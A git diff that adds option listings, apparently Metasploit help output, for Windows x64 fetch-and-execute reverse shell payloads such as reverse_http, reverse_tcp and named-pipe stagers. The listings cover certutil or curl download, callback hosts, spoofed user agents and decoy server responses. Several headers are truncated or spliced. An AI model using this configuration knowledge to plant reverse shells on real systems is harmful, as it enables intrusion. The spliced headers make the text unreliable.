HTTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet) + Module: payload/cmd/windows/http/x64/custom/reverse_http + Platform: Windows + Arch: +Evasion options for payload/cmd/windows/http/x64/custom/reverse_http: +========================= + +atters-r7 + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME jUNLIDtlirT no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path +SHELLCODE_FILE no Shellcode bin to launch + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Custom shellcode stage. + + Tunnel communication over HTTP (Windows x64 wininet) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpProxyHost no An optional proxy server IP address or hostname + HttpProxyPass no An optional proxy server password Max parameter length: 63 characters + HttpProxyPort no An optional proxy server port + HttpProxyType HTTP yes The type of HTTP proxy (Accepted: HTTP, SOCKS) + HttpProxyUser no An optional proxy server username Max parameter length: 63 characters + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14.7; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + StagerURILength no The URI length for the stager (at least 5 bytes) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_https.txt b/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_https.txt new file mode 100644 index 0000000..b172d0e --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_https.txt @@ -0,0 +1,102 @@ + + Name: HTTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet) + Module: payload/cmd/windows/http/x64/custom/reverse_https + Platform: Windows + Arch: +Evasion options for payload/cmd/windows/http/x64/custom/reverse_https: +========================= + +ters-r7 + hdm + agix + rwincey + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME JwRhtGwNOK no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path +SHELLCODE_FILE no Shellcode bin to launch + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Custom shellcode stage. + + Tunnel communication over HTTP (Windows x64 wininet) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpProxyHost no An optional proxy server IP address or hostname + HttpProxyPass no An optional proxy server password Max parameter length: 63 characters + HttpProxyPort no An optional proxy server port + HttpProxyType HTTP yes The type of HTTP proxy (Accepted: HTTP, SOCKS) + HttpProxyUser no An optional proxy server username Max parameter length: 63 characters + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + StagerURILength no The URI length for the stager (at least 5 bytes) + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_named_pipe.txt b/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_named_pipe.txt new file mode 100644 index 0000000..8b668b8 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_named_pipe.txt @@ -0,0 +1,76 @@ + + Name: HTTP Fetch, Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager + Module: payload/cmd/windows/http/x64/custom/reverse_named_pipe + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 131 + Rank: Normal + +Provided by: + Brendan Watters + bwatters-r7 + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME ylcErYfJjgDF no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +PIPEHOST . yes Host of the pipe to connect to +PIPENAME msf-pipe yes Name of the pipe to listen on +SHELLCODE_FILE no Shellcode bin to launch + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Custom shellcode stage. + + Connect back to the attacker via a named pipe pivot + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_tcp.txt new file mode 100644 index 0000000..8f92d1c --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_tcp.txt @@ -0,0 +1,83 @@ + + Name: HTTP Fetch, Windows shellcode stage, Windows x64 Reverse TCP Stager + Module: payload/cmd/windows/http/x64/custom/reverse_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 123 + Rank: Normal + +Provided by: + Brendan Watters + bwatters-r7 + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME qcgJPGEy no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SHELLCODE_FILE no Shellcode bin to launch + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Custom shellcode stage. + + Connect back to the attacker (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_tcp_rc4.txt b/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_tcp_rc4.txt new file mode 100644 index 0000000..c31284d --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_tcp_rc4.txt @@ -0,0 +1,89 @@ + + Name: HTTP Fetch, Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm) + Module: payload/cmd/windows/http/x64/custom/reverse_tcp_rc4 + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 125 + Rank: Normal + +Provided by: + Brendan Watters + bwatters-r7 + hdm + skape + sf + mihi + max3raza + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME iTsegxNFX no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +RC4PASSWORD msf yes Password to derive RC4 key from +SHELLCODE_FILE no Shellcode bin to launch + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Custom shellcode stage. + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_tcp_uuid.txt b/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_tcp_uuid.txt new file mode 100644 index 0000000..d3e4984 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_tcp_uuid.txt @@ -0,0 +1,84 @@ + + Name: HTTP Fetch, Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64) + Module: payload/cmd/windows/http/x64/custom/reverse_tcp_uuid + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 123 + Rank: Normal + +Provided by: + Brendan Watters + bwatters-r7 + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME dNzMwmbu no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SHELLCODE_FILE no Shellcode bin to launch + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Custom shellcode stage. + + Connect back to the attacker with UUID Support (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_winhttp.txt b/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_winhttp.txt new file mode 100644 index 0000000..d4795ae --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_winhttp.txt @@ -0,0 +1,98 @@ + + Name: HTTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp) + Module: payload/cmd/windows/http/x64/custom/reverse_winhttp + Platform: Windows + Arch: cm +Evasion options for payload/cmd/windows/http/x64/custom/reverse_winhttp: +========================= + +-r7 + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME xZFkDyIq no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path +SHELLCODE_FILE no Shellcode bin to launch + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Custom shellcode stage. + + Tunnel communication over HTTP (Windows x64 winhttp) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpProxyHost no An optional proxy server IP address or hostname + HttpProxyIE true no Enable use of IE proxy settings + HttpProxyPass no An optional proxy server password Max parameter length: 63 characters + HttpProxyPort no An optional proxy server port + HttpProxyType HTTP yes The type of HTTP proxy (Accepted: HTTP, SOCKS) + HttpProxyUser no An optional proxy server username Max parameter length: 63 characters + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (iPad; CPU OS 17_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Mobile/15E148 Safari/604.1 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + StagerURILength no The URI length for the stager (at least 5 bytes) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_winhttps.txt 